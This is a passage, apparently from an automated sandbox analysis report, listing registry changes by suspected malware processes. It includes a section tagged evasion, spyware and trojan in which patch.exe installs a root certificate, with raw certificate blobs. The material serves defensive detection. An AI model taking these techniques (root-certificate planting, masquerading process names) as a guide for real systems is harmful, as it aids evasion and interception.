Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ea3dc2a7c0fe4d49bd6e8f3e7e71513f000000000200000000001066000000010000200000007217c1b2cc5470a58ecb36af9c0fb9dd2f9cdef733791b2bf75ecaa5dfba31e2000000000e80000000020000200000009d1abe9554307ea73dea7542f580292dd06538f435c959330b7fb209aa6aa8df90000000077b814dd1371dc158c9c45b76d266647b9273bfe045a9951c56e2b24cf1832a6aa8670bd0631853a18ddf817b6678801c48832bbdd36f705d1bd2edbd2a51f1c332ad942419069bef6869c591f6500acd58d29ee4e426c2e9ad79b711e424780291d6eabe7238f85b6966b4b39ab9447981660b8ac6f6a50b619091840465b9f8ed4cf3cc63b39ae429e642d27939b2400000009fe3cd70940b7769943ee947a771a4bc8c27fd05023c542fe9fb6864327305cce0ef3bf94316ef7596c8e3c35c552623f21069208efe73f6a85cf46027b6338c	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "404544461"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-622 = "Korea Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-161 = "Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-22 = "Cape Verde Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-522 = "N. Central Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	vdkHIxEPSE0HzSAz2UJDgMhL.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec